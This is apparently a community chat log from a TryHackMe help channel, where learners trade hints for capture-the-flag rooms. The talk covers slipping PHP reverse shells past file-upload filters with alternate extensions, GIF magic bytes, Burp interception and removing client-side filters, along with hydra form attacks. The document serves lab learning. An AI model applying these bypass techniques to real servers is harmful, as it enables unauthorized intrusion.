Are you aware of what an abbreviation is?
@trim haven
@trim haven thanks! got it!
:)
and my bad, I read the question too fast and was sure that I understood the question but not xD
anyway thanks for the help 🙂
sometimes, we just need a "programmer duck" :p
very confused where the user flag is in the RootMe machine, I've literally looked at every directory
also doing locate user.txt returns nothing
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
Not for around 3-4 days
It's fine honestly
I’m glad i’m not the only one getting trolled by that flag lol
Delete that please
me?
Yes
which one
We don't use that word here :/
O
Lmao nice!
I finally found the user, I hate the box creator
Can I possibly get a clue/hint for Task 43 in the "Learn Linux" room? I need to get a flag from a file in the root user's directory, my user has no sudo permissions, so I am a bit stumped as to how to do that. It's probably something really easy that I haven't thought of, embarrassingly.
Edit: nvm just seen there is writeups, and it's what I suspected.
can someone maybe give me a clue for [Task 8] Bypassing Server-Side Filtering: File Extensions. Able to upload files, they are just not getting executed for the reverse shell
Which room?
Is this the challenge task?
Does it load for a few seconds or just instantly load?
it wants a png which can be displayed so I renamed shell to shell.png
then traversing to the directory says the file cannot be displayed
Probably isn't being treated as a PHP file then
yes
Might have to try something different
tried .pngphp
Are these valid php extensions? They seem completely wild to me
had to bypass the filter which does like php, maybe try phtml next
In the room c4ptur3th3fl4g I'm trying to figure out what cipher type #7 is, any points in the right direction
Task 1 #7?
Yea task1 #7 sorry
I don’t actually remember so it’s not a spoiler but that looks like it’s been shifted in the ascii table
Bigger hint: ||looks like it’s been ROTated||
I could be wrong FYI that’s just what it looks like
It was, but how could you tell?
The length of each set of characters looks like it doesn’t change the word size. So it’s probably a 1-to-1 match for the cipher. And then the weird characters and special symbols are usually indicative of ROT13 or 47 (whatever the other one is)
Cuz you usually don’t get special characters doing other transformations
Can someone assist me with the Network Service room task 7 #5
Trying to start the tcpdump but keep receiving an error message
It would be helpful to see the error message as well as the command you’re running in a screenshot @iron swallow
you’re not connected to the vpn
I am using the “my machine” that THM provide
for http-auth in hydra does it work with http-get or http-post-form?
post I believe.
in upload vulns room on ||magic numbers section, i was able to upload the file but could not get it to work. have tried many different extensions like phtml, php5, phar etc.|| can someone point me in the right directions?
I don’t think you need to use different file extensions
Just use a .php and change the magic bytes
Have you changed the header
what do you mean? as you can see I've added the ||GIF bytes|| at the beginning
Upload and intercept the request then screenshot burp please
oh yeah! hold on lemme try that
just forwarded that request with different content type
Try again?? I’m not sure but I think that’s how I did it and it worked
@inland onyx May I borrow your knowledge for a second?
Well there it fails
See how it says submit=failure
That wouldn’t work simply because it’s already the wrong file
Do you mind waiting 5 minutes for me to get out of bed and turn on my computer aha
hahaha don't worry about it, I don't want it to become a hassle
Nono I wanna help you solve this :p
thanks
@white salmon Which signature are you using?
what do you mean? @trim haven
Do you mind if I DM you?
i dont mind at all
Awesome
everyone is allowed to DM me haha
👀
@trim haven what's up?
There's an issue with your upload vulns room
I think it may have just been the way Alchemist changed the hex bytes but I'm working it out :p
Sorry for the ping Muir
What's the issue?
They did everything correct but the file was just outputting as text on the website
Which website?
magic bytes http://magic.uploadvulns.thm
Hm, that's interesting. I would suspect it's a difference in how the shell was updated. That one should work exactly as it is in the tutorial section.
Just a straight php server
Yeah, I've sent them my working file to see if it works. I was really confused hence the ping.
Fair
Yes, my file worked.
Well, I'm off to see a Crannog, but lemme know how it goes
Possibly just an issue with the bytes
Thank you anyway <3
Np
are we allowed to ask for hints on jacob yet
@inland onyx it was an issue with the GIF bytes, but now I ran into another issue with jewel... ||Burp Suite does not give me the response to the request... when it does, I can access the JS file in order to stop client-side filtering|| I was actually able to upload the JS file but ||I had to put magic bytes at the beginning of the shell, and when I tried to execute it, it wouldn't work because that messed up the script||
@green sorrel oh, and I don't think so since it's pretty new, wait a few days
@white salmon pretty sure I added a hint saying specifically not to do that
Node webservers don't react quite the same way as a PHP backed server would
@inland onyx oh? well, how would I go about editing the JS file containing the restrictions?
I would suggest capturing it in Burpsuite and removing the filters. I was nice and left them de-obfuscated to make it easier
that's what I did, I removed the filters as well. Thing is, when I reload the site in order to capture the initial request, I ask it to intercept the response as well. When I forward that script I get a 304
Remind me to add in a hint about that
Research what 304 means @white salmon, then see what you can do to stop it from happening.
oh, so it's supposed to be there @inland onyx? I thought the room was borked
@white salmon Strictly speaking it's not actually anything to do with the room. 304 means that the resource hasn't been changed since the last time you requested it -- i.e. an up to date version is stored in your browser's cache already. To save resource usage, your computer just reuses the version it has stored, rather than requesting a new copy.
oh, so that's why I'm not getting the HTML.. thanks Muir!
Hi, so I'm doing Mr Robot. I downloaded the file that I believe contains the second flag, I made a Python program that prints lines of length 32 but there are too many, what should I do?
check if there are duplicates in the file
also that file doesn't have the second flag
oh XD
I checked for duplicates and it doesn't print anything, but thanks, imma do some more digging
please hint for RootMe, it's not working 😭
Can i get a nudge for jacobtheboss privesc to root
can't even change directory
or get a rev shell
upload, this is not working, I tried so many ways for the php thing
I'm losing my mind on it literally
@white salmon can i help you?
yes
how